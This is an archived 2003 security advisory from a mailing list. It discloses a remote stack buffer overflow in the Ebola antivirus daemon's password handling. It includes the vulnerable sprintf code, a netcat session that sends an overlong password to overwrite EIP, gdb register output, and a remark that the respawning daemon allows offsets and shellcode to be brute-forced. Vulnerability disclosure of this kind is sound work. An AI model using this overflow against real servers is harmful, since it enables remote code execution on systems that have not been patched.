[UNIX] PLDaniels Ebola Remote Buffer Overflow

From: SecuriTeam (support_at_securiteam.com)
Date: 12/07/03

  • Next message: SecuriTeam: "[NEWS] WebEye User Disclosure Vulnerability (Exploit)"
    To: list@securiteam.com
    Date: 7 Dec 2003 17:14:03 +0200
    
    

    The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
    - - promotion

    The SecuriTeam alerts list - Free, Accurate, Independent.

    Get your security news from a reliable source.
    http://www.securiteam.com/mailinglist.html

    - - - - - - - - -

      PLDaniels Ebola Remote Buffer Overflow
    ------------------------------------------------------------------------

    SUMMARY

     <http://pldaniels.com/ebola/> Ebola is a AntiVirus scanning daemon system
    which offers to improve considerably the performance of scanning systems
    such as AMaViS, Inflex and other such programs which require ondemand
    scanning from various AV engines. The Ebola daemon contains a remotely
    exploitable buffer overflow in its authentication sequence.

    DETAILS

    Vulnerable systems:
     * Ebola version 0.1.5

    Vulnerable systems:
     * Ebola version 0.1.4 and prior

    This issue is caused by the handle_PASS() function in ebola.c
    char outstr[100];
    ..
    if (passwd) {
       if (PASS_authenticate(username, passwd) == _PASS_OK) {
      sprintf(outstr,"PASS NOT ACCEPTED for user \"%s\",
            pass \"%s\".\n",username,passwd);
    ..

    Exploiting these issues is fairly simple... by providing either an overly
    long password or username you can overflow the 100 byte buffer and over
    write the EIP address.

    bash-2.05b$ nc localhost 1665
    Welcome to Ebola v0.1.4
    user ZZZZXXX
    USER name received, please send PASS
    pass AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA...ABCD
    PASS NOT ACCEPTED for user "ZZZZXXX", pass "AAAAAAAAAAA...

    A quick look in gdb shows us that this should be a vanilla stack overflow.

    [root@RiotStarter root]# gdb ebola 10440
    Attaching to process 10440
    Reading symbols from /home/dotslash/ebola-0.1.4/ebola...
    (gdb) c
    Continuing.

    Program received signal SIGSEGV, Segmentation fault.
    0x44434241 in ?? ()

    (gdb) i r
    eax 0x0 0
    ecx 0xbffba7c4 -1074026556
    edx 0x0 0
    ebx 0x41414141 1094795585
    esp 0xbffbaa10 0xbffbaa10
    ebp 0x41414141 0x41414141
    esi 0x41414141 1094795585
    edi 0x41414141 1094795585
    eip 0x44434241 0x44434241

    The master ebola process never dies... its continues to spawn children
    regardless of how many times you attempt to exploit the issue. Because of
    this you can brute force both the length to eip and the offsets used for
    shellcode.

    Vendor Status:
    Paul L Daniels promptly responded to this issue, a patch was available
    immediately after it was reported.

    ADDITIONAL INFORMATION

    The information has been provided by <mailto:dotslash@snosoft.com> KF.

    ========================================

    This bulletin is sent to members of the SecuriTeam mailing list.
    To unsubscribe from the list, send mail with an empty subject line and body to: list-unsubscribe@securiteam.com
    In order to subscribe to the mailing list, simply forward this email to: list-subscribe@securiteam.com

    ====================
    ====================

    DISCLAIMER:
    The information in this bulletin is provided "AS IS" without warranty of any kind.
    In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.


  • Next message: SecuriTeam: "[NEWS] WebEye User Disclosure Vulnerability (Exploit)"

    Relevant Pages

    • [EXPL] Citadel/UX Remote Buffer Overflow Exploit
      ... The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com ... Citadel/UX Remote ... Listed below is a remote ... GNU gdb Red Hat Linux ...
      (Securiteam)
    • [UNIX] SoX Local Buffer Overflow Vulnerabilities (st_wavstartread)
      ... The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com ... the program first reads 4 bytes from the .WAV file into a variable. ... GNU gdb 6.1-debian ... There is absolutely no warranty for GDB. ...
      (Securiteam)
    • [REVS] Format String Exploitation Demonstration (Linux)
      ... The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com ... GNU gdb 6.5 ... Exit anyway? ... Our offset is 2. ...
      (Securiteam)
    • [NEWS] 0verkill Buffer Overflow Vulnerabilities
      ... The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com ... $HOME environment variable demonstrates the buffer overflow, ... GNU gdb 5.0 ... vulnerability or to otherwise crash the program. ...
      (Securiteam)
    • [UNIX] Qmail Crash and Memory Overwrite After Long SMTP Session
      ... The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com ... Overflow of the 'pos' variable: ... gdb attach 1810 ... Reading symbols from /var/qmail/bin/qmail-smtpd...done. ...
      (Securiteam)